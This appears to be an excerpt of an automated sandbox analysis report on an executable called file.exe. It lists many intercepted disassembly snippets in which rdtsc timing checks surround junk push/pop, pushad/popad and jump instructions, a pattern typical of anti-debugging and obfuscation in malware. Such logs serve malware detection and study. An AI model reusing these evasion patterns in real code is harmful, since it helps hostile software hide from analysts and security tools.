Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3A06 second address: 8E3A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3A0A second address: 8E3A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3A1B second address: 8C9783 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8481503876h 0x0000000c jc 00007F8481503866h 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 sub cx, 1441h 0x0000001a call dword ptr [ebp+122D20AFh] 0x00000020 pushad 0x00000021 jns 00007F8481503868h 0x00000027 push edi 0x00000028 jbe 00007F8481503866h 0x0000002e pop edi 0x0000002f popad 0x00000030 push esi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F848150386Dh 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B214 second address: 92B23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848074392Dh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 jbe 00007F848074392Eh 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B23B second address: 92B23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B6B7 second address: 92B6BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B6BD second address: 92B6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B6C3 second address: 92B6D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Bh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B829 second address: 92B82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B82D second address: 92B831 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B831 second address: 92B839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B839 second address: 92B881 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jg 00007F8480743926h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F8480743934h 0x00000016 push edx 0x00000017 pop edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e pushad 0x0000001f jmp 00007F8480743938h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B881 second address: 92B88A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B88A second address: 92B88E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92BCA1 second address: 92BCA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92BCA5 second address: 92BCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92BCAB second address: 92BCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92BCB1 second address: 92BCB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92BCB7 second address: 92BCBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92BCBB second address: 92BCD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F848074392Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92F308 second address: 92F311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92EBC6 second address: 92EBCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92EE8A second address: 92EE94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8481503866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92EE94 second address: 92EE98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92EFE1 second address: 92F009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007F848150386Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8481503871h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92F009 second address: 92F00F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92F00F second address: 92F022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F848150386Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92F022 second address: 92F02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F8480743932h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9314E4 second address: 9314E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9314E9 second address: 931507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743938h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 931507 second address: 931512 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 932F8C second address: 932F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 936EF5 second address: 936F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F848150386Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 937172 second address: 937176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93776D second address: 937775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 937775 second address: 93779A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F8480743939h 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93779A second address: 9377A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9377A0 second address: 9377A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93C3E7 second address: 93C3FE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007F8481503866h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93C547 second address: 93C551 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93C551 second address: 93C559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93C559 second address: 93C55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93C6DD second address: 93C6E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93C6E1 second address: 93C6E7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93C9AC second address: 93C9B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93C9B0 second address: 93C9BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push esi 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93CB25 second address: 93CB47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8481503878h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93CB47 second address: 93CB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007F8480743940h 0x0000000b popad 0x0000000c jc 00007F848074393Eh 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 896756 second address: 89675B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89675B second address: 8967B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480743938h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F8480743937h 0x00000014 jns 00007F8480743926h 0x0000001a jmp 00007F8480743932h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8967B1 second address: 8967BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8481503866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8967BB second address: 8967C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8967C3 second address: 8967F0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8481503872h 0x00000008 pushad 0x00000009 jmp 00007F8481503876h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9410A8 second address: 9410B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8480743926h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9410B3 second address: 9410B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9410B9 second address: 9410BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9410BF second address: 9410DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503870h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 941677 second address: 94168E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743931h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94168E second address: 9416C7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007F8481503872h 0x00000011 push edi 0x00000012 jmp 00007F8481503879h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 948209 second address: 94820F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9483E4 second address: 9483F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9483F2 second address: 948406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F848074392Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 948980 second address: 948988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 948988 second address: 94898D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94898D second address: 9489B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F848150386Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9489B4 second address: 9489BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8480743926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 948CBA second address: 948CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F8481503872h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 948CD1 second address: 948CF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8480743926h 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007F8480743926h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8480743934h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94958C second address: 9495CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F848150386Ah 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8481503874h 0x00000016 jmp 00007F8481503874h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9495CA second address: 9495CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94985A second address: 94985E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 949B56 second address: 949B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 949B5A second address: 949B66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F8481503866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 949DF5 second address: 949DFF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 949DFF second address: 949E0A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F8481503866h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 949E0A second address: 949E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 js 00007F848074392Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95023B second address: 95023F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 954365 second address: 9543A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F848074392Ah 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 js 00007F848074392Eh 0x00000018 jo 00007F8480743926h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jp 00007F848074393Bh 0x00000029 jmp 00007F8480743935h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9543A3 second address: 9543A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9543A9 second address: 9543AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953503 second address: 95351E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jns 00007F8481503866h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 jnc 00007F8481503866h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95351E second address: 953526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953526 second address: 95352A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953984 second address: 953992 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953992 second address: 953996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953996 second address: 95399A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953AE6 second address: 953B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F8481503879h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e jp 00007F848150386Ch 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jl 00007F848150386Eh 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953B21 second address: 953B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953C83 second address: 953C8D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95C2E6 second address: 95C311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8480743933h 0x0000000a jnl 00007F8480743926h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F8480743926h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95C311 second address: 95C315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95C315 second address: 95C319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95A673 second address: 95A677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95A677 second address: 95A680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95A680 second address: 95A68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95A68A second address: 95A68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95ABC8 second address: 95ABE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8481503872h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95ABE6 second address: 95ABFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F848074392Ah 0x0000000a popad 0x0000000b jc 00007F848074392Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95AE97 second address: 95AE9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95B036 second address: 95B03C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
